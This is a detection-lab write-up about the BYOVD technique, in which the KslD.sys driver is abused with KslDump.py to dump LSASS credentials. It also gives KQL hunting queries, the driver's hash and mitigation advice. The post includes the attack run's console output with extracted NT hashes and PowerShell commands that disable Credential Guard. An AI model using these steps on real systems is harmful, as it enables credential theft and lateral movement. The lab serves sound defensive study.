detection.wiki
← Back to Posts

BYOVD and KslD.sys

How do I use this?

Click this link Copy init KQL. This will copy a lot of KQL to clipboard that will create the required tables, ASIM parsers, helper functions, and start ingestion of the telemetry. A new window will also open to Azure Data Explorer. Create a free cluster and a database (and a Microsoft account if you don't have one) then paste the clipboard contents into the query window and click Run. The bootstrap process will take about a minute. If you have an existing ADX cluster with data in it, keep in mind that the bootstrap process wipes functions and tables that share names with many common tables. You should create another database if you're concerned about data loss.

The Copy init KQL functionality depends on JS. If it isn't enabled, the link will open a new window to GitHub where you can select all and copy the KQL. Then visit Azure Data Explorer to paste and run the bootstrap query. There are links under the Actions heading on the right for convenience.

Synopsis

This is a small lab, even relative to other small labs in the library that will be released shortly. The goal is to give you real telemetry to look around and see what you can find (there is not much). The whole lab consists of just KslDump.py execution, which abuses a vulnerable Microsoft-signed driver for credential theft. You're advised to review the entire README.md for KslDump.py before proceeding. Its not a long read!

Some caveats:

  • Download and file creation events for the driver and script pre-date the available telemetry.
  • I brought the driver because my machine was on 22H2 and didn't have it. I had trouble forcing it to update to 25H2, so I downloaded it from an Azure VM on Windows 11 25H2. I copied it to C:\Windows\System32\drivers, but it wasn't necessary to do that. I could have left it in the user profile Downloads folder and modified the script to use it there. While the driver is currently present on 25H2, this may not be true in the future.

Random notes:

  • There are Zeek and Suricata logs, but they're useless. I should have removed them but did not in my rush to publication.

The attack

I ran the following using elevated privileges. Jump to the analysis.

C:\Users\domainuser\Downloads\KslDump-main\KslDump-main>C:\Users\domainuser\AppData\Local\Programs\Python\Python314\python.exe ksldump.py
[*] Windows Build 22621
[*] Setting up KslD...
[*] KASLR bypass (SubCmd 2)...
  ntoskrnl=0xfffff8040ca00000
[*] Finding lsass.exe...
  lsass.exe PID=1100 DTB=0x7b5a0a002
[*] Finding lsasrv.dll...
  lsasrv.dll base=0x7ffb79bf0000 size=0x1a3000
[*] Extracting LSA keys...
  LSA keys found
[*] Finding LogonSessionList...
[*] Restoring registry...
[-] FATAL: LogonSessionList not found
Traceback (most recent call last):
  File "C:\Users\domainuser\Downloads\KslDump-main\KslDump-main\ksldump.py", line 525, in <module>
    main()
    ~~~~^^
  File "C:\Users\domainuser\Downloads\KslDump-main\KslDump-main\ksldump.py", line 495, in main
    list_ptr, count = find_logon_list(handle, dtb, base, size, build)
                      ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\domainuser\Downloads\KslDump-main\KslDump-main\ksldump.py", line 404, in find_logon_list
    raise Exception("LogonSessionList not found")
Exception: LogonSessionList not found

I ran into issues with incorrect offsets during execution of KslDump.py, probably because the author didn't anticipate execution on this build. I recalculated the offsets with some help using Ghidra and submitted a PR.

C:\Users\domainuser\Downloads\KslDump-main\KslDump-main>C:\Users\domainuser\AppData\Local\Programs\Python\Python314\python.exe ksldump.py
[*] Windows Build 22621
[*] Setting up KslD...
[*] KASLR bypass (SubCmd 2)...
  ntoskrnl=0xfffff8040ca00000
[*] Finding lsass.exe...
  lsass.exe PID=1100 DTB=0x7b5a0a002
[*] Finding lsasrv.dll...
  lsasrv.dll base=0x7ffb79bf0000 size=0x1a3000
[*] Extracting LSA keys...
  LSA keys found
[*] Finding LogonSessionList...
[*] Extracting credentials...

============================================================
[-] No credentials extracted (Credential Guard may be active)
[*] Restoring registry...

Also, Credential Guard was running, so I disabled it:

New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" -Force
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" -Name "LsaCfgFlags" -Value 0

After a reboot, I gave it another try:

C:\Users\domainuser\Downloads\KslDump-main\KslDump-main>C:\Users\domainuser\AppData\Local\Programs\Python\Python314\python.exe ksldump.py
[*] Windows Build 22621
[*] Setting up KslD...
[*] KASLR bypass (SubCmd 2)...
  ntoskrnl=0xfffff8027b400000
[*] Finding lsass.exe...
  lsass.exe PID=1108 DTB=0x7a054b002
[*] Finding lsasrv.dll...
  lsasrv.dll base=0x7ff986610000 size=0x1a3000
[*] Extracting LSA keys...
  LSA keys found
[*] Finding LogonSessionList...
[*] Extracting credentials...

============================================================
[+] 9 credential(s) extracted:

  ludus\domainadmin
    NT:   000000008846f7eaee8fb117ad06bdd8

  Window Manager\DWM-3
    NT:   52a72f764deaec8edc3f61b92122b268

  Font Driver Host\UMFD-3
    NT:   52a72f764deaec8edc3f61b92122b268

  ludus\domainuser
    NT:   000000008846f7eaee8fb117ad06bdd8

  NT VIRTUAL MACHINE\C801C19E-5CEC-4979-B3FF-009B83521EE9
    NT:   52a72f764deaec8edc3f61b92122b268

  Window Manager\DWM-1
    NT:   52a72f764deaec8edc3f61b92122b268

  ludus\JD-WIN11-22H2-1$
    NT:   52a72f764deaec8edc3f61b92122b268

  Font Driver Host\UMFD-0
    NT:   52a72f764deaec8edc3f61b92122b268

  Font Driver Host\UMFD-1
    NT:   52a72f764deaec8edc3f61b92122b268

[*] Restoring registry...

Analysis

The logs only cover successful execution for KslDump.py. There's no additional sequence where credentials are abused.

DeviceEvents
| where ActionType == "DriverLoad"
| project
  Timestamp, DeviceName, FileName, FolderPath, SHA256
TimestampDeviceNameFileNameFolderPathSHA256
2026-03-23T23:35:40.7144930Zjd-win11-22h2-1.ludus.domainKslD.sysC:\Windows\System32\driversbd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a
2026-03-23T23:35:40.7144938Zjd-win11-22h2-1.ludus.domainKslD.sysC:\Windows\System32\driversbd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a
2026-03-23T23:35:45.1581080Zjd-win11-22h2-1.ludus.domainksld.sysC:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26010.5-0\Drivers224fec726efabd577f58573dee38da401c5caa316725afd5f6db3d81cddc9686
2026-03-23T23:35:45.1581083Zjd-win11-22h2-1.ludus.domainksld.sysC:\ProgramData\Microsoft\Windows Defender\Platform\4.18.26010.5-0\Drivers224fec726efabd577f58573dee38da401c5caa316725afd5f6db3d81cddc9686

The vulnerable driver has the SHA256 hash bd1723..

Detections and mitigations

What can we do about this? Audit the environment to ensure this driver isn't present, update devices that have it then delete it, and block the file hash bd17231833aa369b3b2b6963899bf05dbefd673db270aec15446f2fab4a17b5a with WDAC. This will prevent it from being loaded. We can write queries to hunt for it being loaded when it should not have been, and add the file hash in the Defender portal (or your preferred EDR) so that it is quarantined upon creation/download. You will, of course, want to be careful how you do the latter to avoid accidentally breaking Defender.

Why train on non-vulnerabilities like Bring Your Own Vulnerable Driver (BYOVD)? If you read Andrea's Responsible Disclosure section, you'll see Microsoft's finding that this is not a vulnerability. Whether we agree or not, BYOVD techniques evade monitoring that defenders rely on for visibility. Cached domain credentials in LSASS provide a bridge for lateral movement and potential domain compromise. Understanding these detection blind spots helps defenders find coverage gaps and implement controls.

References

Huntress - They Got In Through SonicWall. Then They Tried to Kill Every Security Tool
Fortinet - Massive Winos 4.0 Campaigns Target Taiwan
SentinelOne - Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks
http://github.com/andreisss/KslDump